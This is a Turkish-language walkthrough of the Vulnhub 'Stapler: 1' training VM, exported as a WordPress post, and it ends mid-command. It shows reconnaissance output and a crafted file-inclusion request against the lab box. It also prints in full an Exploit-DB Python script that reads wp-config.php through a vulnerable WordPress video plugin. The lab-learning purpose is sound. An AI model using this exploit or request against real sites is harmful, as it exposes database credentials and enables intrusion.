{"id":1150,"date":"2021-05-30T20:07:24","date_gmt":"2021-05-30T20:07:24","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1150"},"modified":"2021-05-30T20:18:16","modified_gmt":"2021-05-30T20:18:16","slug":"stapler-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/30\/stapler-1\/","title":{"rendered":"STAPLER: 1"},"content":{"rendered":"<h2>Makine Hakk\u0131nda Bilgiler<\/h2>\n<p><strong>A\u00e7\u0131klama:<\/strong><br \/>\nAverage beginner\/intermediate VM, only a few twists<br \/>\nMay find it easy\/hard (depends on YOUR background)<br \/>\n...also which way you attack the box<br \/>\nIt SHOULD work on both VMware and Virtualbox<br \/>\nREBOOT the VM if you CHANGE network modes<br \/>\nFusion users, you'll need to retry when importing<\/p>\n<p><strong>Vulnhub Sayfas\u0131:<\/strong><br \/>\n<a href=\"http:\/\/144.76.171.171\/blog\/index.php\/fristileaks-1-3\/\">http:\/\/144.76.171.171\/blog\/index.php\/fristileaks-1-3\/<\/a><\/p>\n<p><strong>\u0130ndirme Sayfas\u0131:<\/strong> <a href=\"https:\/\/download.vulnhub.com\/stapler\/Stapler.zip\">https:\/\/download.vulnhub.com\/stapler\/Stapler.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>\u0130lk \u00f6nce hedef makinenin ip adresini tespit ederek ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ifconfig eth0                                                                                                                                       130 \u2a2f\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.0.21  netmask 255.255.255.0  broadcast 192.168.0.255\n        inet6 fe80::20c:29ff:fe4a:4d3f  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 00:0c:29:4a:4d:3f  txqueuelen 1000  (Ethernet)\n        RX packets 5680  bytes 995112 (971.7 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 9958  bytes 1268241 (1.2 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# arp-scan -l | grep 08:00:27:ba:ad:72\n192.168.0.25    08:00:27:ba:ad:72   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# \n<\/code><\/pre>\n<p>Bir nmap taramas\u0131 ger\u00e7ekle\u015ftirelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# nmap 192.168.0.25 -p- -A    \nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-05-29 19:44 EDT\nNmap scan report for 192.168.0.25\nHost is up (0.0010s latency).\nNot shown: 65523 filtered ports\nPORT      STATE  SERVICE     VERSION\n20\/tcp    closed ftp-data\n21\/tcp    open   ftp         vsftpd 2.0.8 or later\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_Can&#039;t get directory listing: PASV failed: 550 Permission denied.\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 192.168.0.21\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)\n|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)\n|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)\n53\/tcp    open   domain      dnsmasq 2.75\n| dns-nsid: \n|_  bind.version: dnsmasq-2.75\n80\/tcp    open   http        PHP cli server 5.5 or later\n|_http-title: 404 Not Found\n123\/tcp   closed ntp\n137\/tcp   closed netbios-ns\n138\/tcp   closed netbios-dgm\n139\/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)\n666\/tcp   open   doom?\n| fingerprint-strings: \n|   NULL: \n|     message2.jpgUT \n|     QWux\n|     &quot;DL[E\n|     #;3[\n|     \\xf6\n|     u([r\n|     qYQq\n|     Y_?n2\n|     3&amp;M~{\n|     9-a)T\n|     L}AJ\n|_    .npy.9\n3306\/tcp  open   mysql       MySQL 5.7.12-0ubuntu1\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.7.12-0ubuntu1\n|   Thread ID: 8\n|   Capabilities flags: 63487\n|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, FoundRows, Speaks41ProtocolOld, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsCompression, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: \\x07{J\\I;+o\\x08\\x03r\\x17j\\x16\\x1F\\x10m=\\x16\\x08\n|_  Auth Plugin Name: mysql_native_password\n12380\/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Site doesn&#039;t have a title (text\/html).\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port666-TCP:V=7.91%I=7%D=5\/29%Time=60B2D232%P=x86_64-pc-linux-gnu%r(NUL\nSF:L,1350,&quot;PK\\x03\\x04\\x14\\0\\x02\\0\\x08\\0d\\x80\\xc3Hp\\xdf\\x15\\x81\\xaa,\\0\\0\\x1\nSF:52\\0\\0\\x0c\\0\\x1c\\0message2\\.jpgUT\\t\\0\\x03\\+\\x9cQWJ\\x9cQWux\\x0b\\0\\x01\\x0\nSF:4\\xf5\\x01\\0\\0\\x04\\x14\\0\\0\\0\\xadz\\x0bT\\x13\\xe7\\xbe\\xefP\\x94\\x88\\x88A@\\xa\nSF:2\\x20\\x19\\xabUT\\xc4T\\x11\\xa9\\x102&gt;\\x8a\\xd4RDK\\x15\\x85Jj\\xa9\\&quot;DL\\[E\\xa2\\\nSF:x0c\\x19\\x140&lt;\\xc4\\xb4\\xb5\\xca\\xaen\\x89\\x8a\\x8aV\\x11\\x91W\\xc5H\\x20\\x0f\\x\nSF:b2\\xf7\\xb6\\x88\\n\\x82@%\\x99d\\xb7\\xc8#;3\\[\\r_\\xcddr\\x87\\xbd\\xcf9\\xf7\\xaeu\nSF:\\xeeY\\xeb\\xdc\\xb3oX\\xacY\\xf92\\xf3e\\xfe\\xdf\\xff\\xff\\xff=2\\x9f\\xf3\\x99\\xd\nSF:3\\x08y}\\xb8a\\xe3\\x06\\xc8\\xc5\\x05\\x82&gt;`\\xfe\\x20\\xa7\\x05:\\xb4y\\xaf\\xf8\\xa\nSF:0\\xf8\\xc0\\^\\xf1\\x97sC\\x97\\xbd\\x0b\\xbd\\xb7nc\\xdc\\xa4I\\xd0\\xc4\\+j\\xce\\[\\x\nSF:87\\xa0\\xe5\\x1b\\xf7\\xcc=,\\xce\\x9a\\xbb\\xeb\\xeb\\xdds\\xbf\\xde\\xbd\\xeb\\x8b\\x\nSF:f4\\xfdis\\x0f\\xeeM\\?\\xb0\\xf4\\x1f\\xa3\\xcceY\\xfb\\xbe\\x98\\x9b\\xb6\\xfb\\xe0\\x\nSF:dc\\]sS\\xc5bQ\\xfa\\xee\\xb7\\xe7\\xbc\\x05AoA\\x93\\xfe9\\xd3\\x82\\x7f\\xcc\\xe4\\xd\nSF:5\\x1dx\\xa2O\\x0e\\xdd\\x994\\x9c\\xe7\\xfe\\x871\\xb0N\\xea\\x1c\\x80\\xd63w\\xf1\\xa\nSF:f\\xbd&amp;&amp;q\\xf9\\x97&#039;i\\x85fL\\x81\\xe2\\\\\\xf6\\xb9\\xba\\xcc\\x80\\xde\\x9a\\xe1\\xe2:\nSF:\\xc3\\xc5\\xa9\\x85`\\x08r\\x99\\xfc\\xcf\\x13\\xa0\\x7f{\\xb9\\xbc\\xe5:i\\xb2\\x1bk\\\nSF:x8a\\xfbT\\x0f\\xe6\\x84\\x06\/\\xe8-\\x17W\\xd7\\xb7&amp;\\xb9N\\x9e&lt;\\xb1\\\\\\.\\xb9\\xcc\\\nSF:xe7\\xd0\\xa4\\x19\\x93\\xbd\\xdf\\^\\xbe\\xd6\\xcdg\\xcb\\.\\xd6\\xbc\\xaf\\|W\\x1c\\xfd\nSF:\\xf6\\xe2\\x94\\xf9\\xebj\\xdbf~\\xfc\\x98x&#039;\\xf4\\xf3\\xaf\\x8f\\xb9O\\xf5\\xe3\\xcc\\\nSF:x9a\\xed\\xbf`a\\xd0\\xa2\\xc5KV\\x86\\xad\\n\\x7fou\\xc4\\xfa\\xf7\\xa37\\xc4\\|\\xb0\\\nSF:xf1\\xc3\\x84O\\xb6nK\\xdc\\xbe#\\)\\xf5\\x8b\\xdd{\\xd2\\xf6\\xa6g\\x1c8\\x98u\\(\\[r\\\nSF:xf8H~A\\xe1qYQq\\xc9w\\xa7\\xbe\\?}\\xa6\\xfc\\x0f\\?\\x9c\\xbdTy\\xf9\\xca\\xd5\\xaak\nSF:\\xd7\\x7f\\xbcSW\\xdf\\xd0\\xd8\\xf4\\xd3\\xddf\\xb5F\\xabk\\xd7\\xff\\xe9\\xcf\\x7fy\\\nSF:xd2\\xd5\\xfd\\xb4\\xa7\\xf7Y_\\?n2\\xff\\xf5\\xd7\\xdf\\x86\\^\\x0c\\x8f\\x90\\x7f\\x7f\nSF:\\xf9\\xea\\xb5m\\x1c\\xfc\\xfef\\&quot;\\.\\x17\\xc8\\xf5\\?B\\xff\\xbf\\xc6\\xc5,\\x82\\xcb\\\nSF:[\\x93&amp;\\xb9NbM\\xc4\\xe5\\xf2V\\xf6\\xc4\\t3&amp;M~{\\xb9\\x9b\\xf7\\xda-\\xac\\]_\\xf9\\x\nSF:cc\\[qt\\x8a\\xef\\xbao\/\\xd6\\xb6\\xb9\\xcf\\x0f\\xfd\\x98\\x98\\xf9\\xf9\\xd7\\x8f\\xa\nSF:7\\xfa\\xbd\\xb3\\x12_@N\\x84\\xf6\\x8f\\xc8\\xfe{\\x81\\x1d\\xfb\\x1fE\\xf6\\x1f\\x81\\\nSF:xfd\\xef\\xb8\\xfa\\xa1i\\xae\\.L\\xf2\\\\g@\\x08D\\xbb\\xbfp\\xb5\\xd4\\xf4Ym\\x0bI\\x9\nSF:6\\x1e\\xcb\\x879-a\\)T\\x02\\xc8\\$\\x14k\\x08\\xae\\xfcZ\\x90\\xe6E\\xcb&lt;C\\xcap\\x8f\nSF:\\xd0\\x8f\\x9fu\\x01\\x8dvT\\xf0&#039;\\x9b\\xe4ST%\\x9f5\\x95\\xab\\rSWb\\xecN\\xfb&amp;\\xf4\nSF:\\xed\\xe3v\\x13O\\xb73A#\\xf0,\\xd5\\xc2\\^\\xe8\\xfc\\xc0\\xa7\\xaf\\xab4\\xcfC\\xcd\\\nSF:x88\\x8e}\\xac\\x15\\xf6~\\xc4R\\x8e`wT\\x96\\xa8KT\\x1cam\\xdb\\x99f\\xfb\\n\\xbc\\xb\nSF:cL}AJ\\xe5H\\x912\\x88\\(O\\0k\\xc9\\xa9\\x1a\\x93\\xb8\\x84\\x8fdN\\xbf\\x17\\xf5\\xf0\nSF:\\.npy\\.9\\x04\\xcf\\x14\\x1d\\x89Rr9\\xe4\\xd2\\xae\\x91#\\xfbOg\\xed\\xf6\\x15\\x04\\\nSF:xf6~\\xf1\\]V\\xdcBGu\\xeb\\xaa=\\x8e\\xef\\xa4HU\\x1e\\x8f\\x9f\\x9bI\\xf4\\xb6GTQ\\x\nSF:f3\\xe9\\xe5\\x8e\\x0b\\x14L\\xb2\\xda\\x92\\x12\\xf3\\x95\\xa2\\x1c\\xb3\\x13\\*P\\x11\\\nSF:?\\xfb\\xf3\\xda\\xcaDfv\\x89`\\xa9\\xe4k\\xc4S\\x0e\\xd6P0&quot;);\nMAC Address: 08:00:27:BA:AD:72 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: Host: RED; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h39m58s, deviation: 34m37s, median: 2h59m57s\n|_nbstat: NetBIOS name: RED, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)\n|   Computer name: red\n|   NetBIOS computer name: RED\\x00\n|   Domain name: \\x00\n|   FQDN: red\n|_  System time: 2021-05-30T03:46:06+01:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2021-05-30T02:46:05\n|_  start_date: N\/A\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   1.03 ms 192.168.0.25\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 154.42 seconds\n<\/code><\/pre>\n<p>\u015eimdi bir de\u011ferlendirelim. ftp Anonymous login mevcut. ssh, http sunucular\u0131m\u0131z, mysql ve sambam\u0131z mevcut. Bilgi toplanacak \u00e7ok fazla servis var. Hadi ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ftp 192.168.0.25 \nConnected to 192.168.0.25.\n220-\n220-|-----------------------------------------------------------------------------------------|\n220-| Harry, make sure to update the banner when you get a chance to show who has access here |\n220-|-----------------------------------------------------------------------------------------|\n220-\n220 \nName (192.168.0.25:kali): Anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             107 Jun 03  2016 note\n226 Directory send OK.\nftp&gt; get note\nlocal: note remote: note\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for note (107 bytes).\n226 Transfer complete.\n107 bytes received in 0.00 secs (37.0015 kB\/s)\nftp&gt; bye\n221 Goodbye.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat note                                  \nElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.\n<\/code><\/pre>\n<p>San\u0131r\u0131m baz\u0131 kullan\u0131c\u0131lar elde ettik. Daha sonras\u0131nda enum4linux taramas\u0131 ger\u00e7ekle\u015ftirdim. \u00c7\u0131kt\u0131lar\u0131 a\u015fa\u011f\u0131da:<\/p>\n<pre><code class=\"language-sh\">\n ========================================= \n|    Share Enumeration on 192.168.0.25    |\n ========================================= \n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    print$          Disk      Printer Drivers\n    kathy           Disk      Fred, What are we doing here?\n    tmp             Disk      All temporary files should be stored here\n    IPC$            IPC       IPC Service (red server (Samba, Ubuntu))\nSMB1 disabled -- no workgroup available\n\n[+] Attempting to map shares on 192.168.0.25\n\/\/192.168.0.25\/print$   Mapping: DENIED, Listing: N\/A\n\/\/192.168.0.25\/kathy    Mapping: OK, Listing: OK\n\/\/192.168.0.25\/tmp  Mapping: OK, Listing: OK\n\/\/192.168.0.25\/IPC$ [E] Can&#039;t understand response:\nNT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*\n\n...\n\n[+] Enumerating users using SID S-1-22-1 and logon username &#039;&#039;, password &#039;&#039;\nS-1-22-1-1000 Unix User\\peter (Local User)\nS-1-22-1-1001 Unix User\\RNunemaker (Local User)\nS-1-22-1-1002 Unix User\\ETollefson (Local User)\nS-1-22-1-1003 Unix User\\DSwanger (Local User)\nS-1-22-1-1004 Unix User\\AParnell (Local User)\nS-1-22-1-1005 Unix User\\SHayslett (Local User)\nS-1-22-1-1006 Unix User\\MBassin (Local User)\nS-1-22-1-1007 Unix User\\JBare (Local User)\nS-1-22-1-1008 Unix User\\LSolum (Local User)\nS-1-22-1-1009 Unix User\\IChadwick (Local User)\nS-1-22-1-1010 Unix User\\MFrei (Local User)\nS-1-22-1-1011 Unix User\\SStroud (Local User)\nS-1-22-1-1012 Unix User\\CCeaser (Local User)\nS-1-22-1-1013 Unix User\\JKanode (Local User)\nS-1-22-1-1014 Unix User\\CJoo (Local User)\nS-1-22-1-1015 Unix User\\Eeth (Local User)\nS-1-22-1-1016 Unix User\\LSolum2 (Local User)\nS-1-22-1-1017 Unix User\\JLipps (Local User)\nS-1-22-1-1018 Unix User\\jamie (Local User)\nS-1-22-1-1019 Unix User\\Sam (Local User)\nS-1-22-1-1020 Unix User\\Drew (Local User)\nS-1-22-1-1021 Unix User\\jess (Local User)\nS-1-22-1-1022 Unix User\\SHAY (Local User)\nS-1-22-1-1023 Unix User\\Taylor (Local User)\nS-1-22-1-1024 Unix User\\mel (Local User)\nS-1-22-1-1025 Unix User\\kai (Local User)\nS-1-22-1-1026 Unix User\\zoe (Local User)\nS-1-22-1-1027 Unix User\\NATHAN (Local User)\nS-1-22-1-1028 Unix User\\www (Local User)\nS-1-22-1-1029 Unix User\\elly (Local User)<\/code><\/pre>\n<p>Kullan\u0131c\u0131lar vepayla\u015f\u0131ma al\u0131nm\u0131\u015f klas\u00f6rler elde ettik. \u0130nceleyelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# smbclient \/\/192.168.0.25\/kathy\nEnter WORKGROUP\\root&#039;s password: \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Fri Jun  3 12:52:52 2016\n  ..                                  D        0  Mon Jun  6 17:39:56 2016\n  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016\n  backup                              D        0  Sun Jun  5 11:04:14 2016\n\n        19478204 blocks of size 1024. 16397096 blocks available\nsmb: \\&gt; cd kathy_stuff\nsmb: \\kathy_stuff\\&gt; ls\n  .                                   D        0  Sun Jun  5 11:02:27 2016\n  ..                                  D        0  Fri Jun  3 12:52:52 2016\n  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016\n\n        19478204 blocks of size 1024. 16397096 blocks available\nsmb: \\kathy_stuff\\&gt; get todo-list.txt\ngetting file \\kathy_stuff\\todo-list.txt of size 64 as todo-list.txt (10.4 KiloBytes\/sec) (average 10.4 KiloBytes\/sec)\nsmb: \\kathy_stuff\\&gt; cd ..\nsmb: \\&gt; ls\n  .                                   D        0  Fri Jun  3 12:52:52 2016\n  ..                                  D        0  Mon Jun  6 17:39:56 2016\n  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016\n  backup                              D        0  Sun Jun  5 11:04:14 2016\n\n        19478204 blocks of size 1024. 16397096 blocks available\nsmb: \\&gt; cd backup\\\nsmb: \\backup\\&gt; ls\n  .                                   D        0  Sun Jun  5 11:04:14 2016\n  ..                                  D        0  Fri Jun  3 12:52:52 2016\n  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016\n  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015\n\n        19478204 blocks of size 1024. 16397096 blocks available\nsmb: \\backup\\&gt; get vsftpd.conf\ngetting file \\backup\\vsftpd.conf of size 5961 as vsftpd.conf (646.8 KiloBytes\/sec) (average 392.3 KiloBytes\/sec)\nsmb: \\backup\\&gt; exit\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ls\nnote  todo-list.txt  vsftpd.conf\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat todo-list.txt                         \nI&#039;m making sure to backup anything important for Initech, Kathy\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler\/wordpress]\n\u2514\u2500# smbclient \/\/192.168.0.25\/tmp  \nEnter WORKGROUP\\root&#039;s password: \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Tue Jun  7 04:08:39 2016\n  ..                                  D        0  Mon Jun  6 17:39:56 2016\n  ls                                  N      274  Sun Jun  5 11:32:58 2016\n\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler\/wordpress]\n\u2514\u2500# cat ls         \n.:\ntotal 12.0K\ndrwxrwxrwt  2 root root 4.0K Jun  5 16:32 .\ndrwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..\n-rw-r--r--  1 root root    0 Jun  5 16:32 ls\ndrwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ\n<\/code><\/pre>\n<p>smb ile ilgili toplad\u0131\u011f\u0131m bilgiler yukar\u0131da. Devam edelim.<br \/>\nNikto arac\u0131 ger\u00e7ekten hakk\u0131 teslim edilmesi gereken bir ara\u00e7 vermi\u015f oldu\u011fu bilgiler i\u015fimi \u00e7ok kolayla\u015ft\u0131rd\u0131.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# nikto -h http:\/\/192.168.0.25:12380\/\n- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP:          192.168.0.25\n+ Target Hostname:    192.168.0.25\n+ Target Port:        12380\n---------------------------------------------------------------------------\n+ SSL Info:        Subject:  \/C=UK\/ST=Somewhere in the middle of nowhere\/L=Really, what are you meant to put here?\/O=Initech\/OU=Pam: I give up. no idea what to put here.\/CN=Red.Initech\/emailAddress=pam@red.localhost\n                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384\n                   Issuer:   \/C=UK\/ST=Somewhere in the middle of nowhere\/L=Really, what are you meant to put here?\/O=Initech\/OU=Pam: I give up. no idea what to put here.\/CN=Red.Initech\/emailAddress=pam@red.localhost\n+ Start Time:         2021-05-29 20:12:28 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.18 (Ubuntu)\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ Uncommon header &#039;dave&#039; found, with contents: Soemthing doesn&#039;t look right here\n+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.\n+ The site uses SSL and Expect-CT header is not present.\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Entry &#039;\/admin112233\/&#039; in robots.txt returned a non-forbidden or redirect HTTP code (200)\n+ Entry &#039;\/blogblog\/&#039; in robots.txt returned a non-forbidden or redirect HTTP code (200)\n+ &quot;robots.txt&quot; contains 2 entries which should be manually viewed.\n+ Apache\/2.4.18 appears to be outdated (current is at least Apache\/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.\n+ Hostname &#039;192.168.0.25&#039; does not match certificate&#039;s names: Red.Initech\n+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS \n+ Uncommon header &#039;x-ob_mode&#039; found, with contents: 1\n+ OSVDB-3233: \/icons\/README: Apache default file found.\n+ \/phpmyadmin\/: phpMyAdmin directory found\n+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time:           2021-05-29 20:23:38 (GMT-4) (670 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n<\/code><\/pre>\n<p>Normalde http ile gitti\u011fimde 400 kodu ald\u0131\u011f\u0131m sunuya https ile gitti\u011fimde 200 http kodunu alabildim. Bir wordpress sayfas\u0131 tespit ettim ve wpscan ile API arac\u0131l\u0131\u011f\u0131 ile bir tarama i\u015flemi ger\u00e7ekle\u015ftirdim. Burada bir s\u00fcr\u00fc bulgu \u00e7\u0131kt\u0131 tabikide ancak en \u00f6nelisi <a href=\"https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/plugins\/\">https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/plugins\/<\/a> adresinde tespit etti\u011fim <strong>advanced-video-embed-embed-videos-or-playlists\/<\/strong> pluginiydi. <\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# searchsploit advanced video wordpress\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                                                                             |  Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nWordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                                                 | php\/webapps\/39646.py\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# locate php\/webapps\/39646.py                             \n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/39646.py\ncp                                                                                                                                                                                                                                             \n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cp \/usr\/share\/exploitdb\/exploits\/php\/webapps\/39646.py . \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat 39646.py                                           \n#!\/usr\/bin\/env python\n\n# Exploit Title: Advanced-Video-Embed Arbitrary File Download \/ Unauthenticated Post Creation\n# Google Dork: N\/A\n# Date: 04\/01\/2016\n# Exploit Author: evait security GmbH\n# Vendor Homepage: arshmultani - http:\/\/dscom.it\/\n# Software Link: https:\/\/wordpress.org\/plugins\/advanced-video-embed-embed-videos-or-playlists\/\n# Version: 1.0\n# Tested on: Linux Apache \/ WordPress 4.2.2\n\n#   Timeline\n#   03\/24\/2016 - Bug discovered\n#   03\/24\/2016 - Initial notification of vendor\n#   04\/01\/2016 - No answer from vendor, public release of bug \n\n# Vulnerable Code (\/inc\/classes\/class.avePost.php) Line 57:\n\n#  function ave_publishPost(){\n#    $title = $_REQUEST[&#039;title&#039;];\n#    $term = $_REQUEST[&#039;term&#039;];\n#    $thumb = $_REQUEST[&#039;thumb&#039;];\n# &lt;snip&gt;\n# Line 78:\n#    $image_data = file_get_contents($thumb);\n\n# POC - http:\/\/127.0.0.1\/wordpress\/wp-admin\/admin-ajax.php?action=ave_publishPost&amp;title=random&amp;short=1&amp;term=1&amp;thumb=[FILEPATH]\n\n# Exploit - Print the content of wp-config.php in terminal (default WordPress config)\n\nimport random\nimport urllib2\nimport re\n\nurl = &quot;http:\/\/127.0.0.1\/wordpress&quot; # insert url to wordpress\n\nrandomID = long(random.random() * 100000000000000000L)\n\nobjHtml = urllib2.urlopen(url + &#039;\/wp-admin\/admin-ajax.php?action=ave_publishPost&amp;title=&#039; + str(randomID) + &#039;&amp;short=rnd&amp;term=rnd&amp;thumb=..\/wp-config.php&#039;)\ncontent =  objHtml.readlines()\nfor line in content:\n    numbers = re.findall(r&#039;\\d+&#039;,line)\n    id = numbers[-1]\n    id = int(id) \/ 10\n\nobjHtml = urllib2.urlopen(url + &#039;\/?p=&#039; + str(id))\ncontent = objHtml.readlines()\n\nfor line in content:\n    if &#039;attachment-post-thumbnail size-post-thumbnail wp-post-image&#039; in line:\n        urls=re.findall(&#039;&quot;(https?:\/\/.*?)&quot;&#039;, line)\n        print urllib2.urlopen(urls[0]).read()     <\/code><\/pre>\n<p>Bizimde pluginimizin s\u00fcr\u00fcm\u00fc 1 yani s\u00fcr\u00fcmler uyu\u015fuyor. Ayr\u0131ca bununla alakal\u0131 bir exploit de mevcut. Kodu okuduktan sonra s\u00fcre\u00e7leri kendim ger\u00e7ekle\u015ftirdim. <a href=\"https:\/\/192.168.0.25:12380\/blogblog\/\/wp-admin\/admin-ajax.php?action=ave_publishPost&amp;title=1822&amp;short=rnd&amp;term=rnd&amp;thumb=..\/wp-config.php\">https:\/\/192.168.0.25:12380\/blogblog\/\/wp-admin\/admin-ajax.php?action=ave_publishPost&title=1822&short=rnd&term=rnd&thumb=..\/wp-config.php<\/a> \u015feklinde bir istek ger\u00e7ekle\u015ftirdim. Daha sonras\u0131nda taray\u0131c\u0131 \u00fczerinden <a href=\"https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/\">https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/<\/a> klas\u00f6r\u00fcne gidip oradaki resimleri kalime indirdim. Bu resim dosyalar\u0131n\u0131 cat ile okudu\u011fumda istedi\u011fi verilere ula\u015fabildim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# wget 